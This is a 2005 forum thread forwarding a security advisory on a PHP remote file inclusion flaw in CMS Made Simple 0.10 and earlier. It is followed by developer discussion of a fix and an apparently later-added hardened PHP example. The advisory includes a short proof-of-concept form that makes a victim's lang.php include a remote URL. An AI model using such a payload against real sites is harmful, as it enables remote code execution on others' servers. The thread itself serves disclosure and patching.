 Post subject: Security Announce: CMS Made Simple <= 0.10 - PHP injection
PostPosted: Thu Sep 01, 2005 7:49 am 
I belong to phpsec, a security mailing list and this mail turned up this morning.  Not sure if you've seen it yet Wishy?

Quote:
------ Forwarded Message
From:
Date: 31 Aug 2005 19:18:04 -0000
To:
Subject: CMS Made Simple <= 0.10 - PHP injection

  -- == -- == -- == -- == -- == -- == -- == -- == -- == --
  Name: CMS Made Simple - PHP injection
  Version <= 0.10
  Homepage: http://www.cmsmadesimple.org/

  Author: Filip Groszynski (VXSfx)
  Date: 31 August 2005
  -- == -- == -- == -- == -- == -- == -- == -- == -- == --

  Background:

CMS Made Simple is an easy to use content management system for simple, stable content sites. It uses PHP, MySQL and the Smarty templating system.

  --------------------------------------------------------
 
  Vulnerable code exist in ./admin/lang.php:

  ...
  $current_language = "en_US";
  #Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE)) {
    ...
    #Check to see if there is already a language in use...
    if (isset($_POST["change_cms_lang"])) {
[!]   $current_language = $_POST["change_cms_lang"];
      setcookie("cms_language", $_POST["change_cms_lang"]);
    } else if (isset($_COOKIE["cms_language"])) {
      $current_language = $_COOKIE["cms_language"];
    }
    else {
      ...
    }

    #Ok, we have a language to load, let's load it already...
    if (isset($nls['file'][$current_language])) {
      foreach ($nls['file'][$current_language] as $onefile) {
[!]     include($onefile);
      }
    }
    ...
  }
  ...
  ?>
  --------------------------------------------------------

  Exploit:

example.html:
 
action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vx
sfx]=(__URL__)" method=post>
 
 
 

EOF

  --------------------------------------------------------

  Contact:

      Author: Filip Groszynski (VXSfx)
      Location: Poland
      Email: groszynskif <|> gmail <|> com

  -- == -- == -- == -- == -- == -- == -- == -- == -- == --


------ End of Forwarded Message



--
[phpsec] Mailing List
Brought to you by php|architect - http://www.phparch.com

For account maintenance, please visit http://www.phparch.com/phpsec




Reading the example exploit, I'm pretty sure that it can only occur with register_globals set to on. However, it still needs fixing.

Possible fix:
Ensure that $onefile is a local file within the expected cmsms directory before including it. (Probably have to store the "expected cms directory" as a define/const maybe?)


Rob...


 Post subject: Re: Security Announce: CMS Made Simple <= 0.10 - PHP injection
PostPosted: Thu Sep 01, 2005 9:45 am 
Actually, I was going to release a fix this morning.  I was just going to make sure $nls and $lang were declared as blank arrays at the top of the page.  This way, even if $nls was passed with register_globals on, any offending URLs would get blown away.

Make sense?

_________________
http://about.me/tedkulp
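To make the two mitigations raised in this thread concrete, here is an added example (not CMS Made Simple's own code, and not Ted's actual patch) of what a hardened lang.php fragment could look like: the arrays are blanked before any request data can seed them, the language code is checked against the trusted table, and only files that resolve inside the expected language directory are included. The CMS_LANG_DIR constant, the sample $nls entry and the helper name are assumptions for this example.

```php
<?php
// Added example, not CMS Made Simple's own code. CMS_LANG_DIR, the $nls
// layout and cms_safe_lang_file() are assumptions made for illustration.
define('CMS_LANG_DIR', realpath(dirname(__FILE__) . '/lang'));  // assumed path

// 1. Blank the arrays first: anything injected through register_globals
//    (e.g. a request parameter named nls) is discarded at this point.
$nls  = array();
$lang = array();

// Populate $nls only from trusted files under CMS_LANG_DIR (constructed sample).
$nls['file']['en_US'] = array(CMS_LANG_DIR . '/en_US/admin.inc.php');

/**
 * Return the absolute path of $file if it is a regular file located under
 * CMS_LANG_DIR, or false otherwise (rejects URLs, traversal, foreign paths).
 */
function cms_safe_lang_file($file)
{
    // realpath() returns false for non-existent paths and URL wrappers, and it
    // collapses "../", so a prefix comparison on its result is meaningful.
    $real = realpath($file);
    if ($real === false || !is_file($real)) {
        return false;
    }
    $base = CMS_LANG_DIR . DIRECTORY_SEPARATOR;
    if (strncmp($real, $base, strlen($base)) !== 0) {
        return false;
    }
    return $real;
}

// 2. Accept a language code only if it exists in the trusted table.
$current_language = 'en_US';
if (isset($_POST['change_cms_lang']) && isset($nls['file'][$_POST['change_cms_lang']])) {
    $current_language = $_POST['change_cms_lang'];
    setcookie('cms_language', $current_language);
} elseif (isset($_COOKIE['cms_language']) && isset($nls['file'][$_COOKIE['cms_language']])) {
    $current_language = $_COOKIE['cms_language'];
}

// 3. Include only files that pass the directory check.
foreach ($nls['file'][$current_language] as $onefile) {
    $safe = cms_safe_lang_file($onefile);
    if ($safe !== false) {
        include $safe;
    }
}
```

Step 1 alone is Ted's fix; steps 2 and 3 add Rob's suggestion of confining includes to the expected directory, which also protects against a future code path that lets a user influence $nls.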


 
 Post subject: Re: Security Announce: CMS Made Simple <= 0.10 - PHP injection
PostPosted: Thu Sep 01, 2005 12:29 pm 
http://forum.cmsmadesimple.org/index.ph ... 554.0.html

_________________
http://about.me/tedkulp


 Post subject: Re: Security Announce: CMS Made Simple <= 0.10 - PHP injection
PostPosted: Thu Sep 01, 2005 3:25 pm 
Looks good to me.

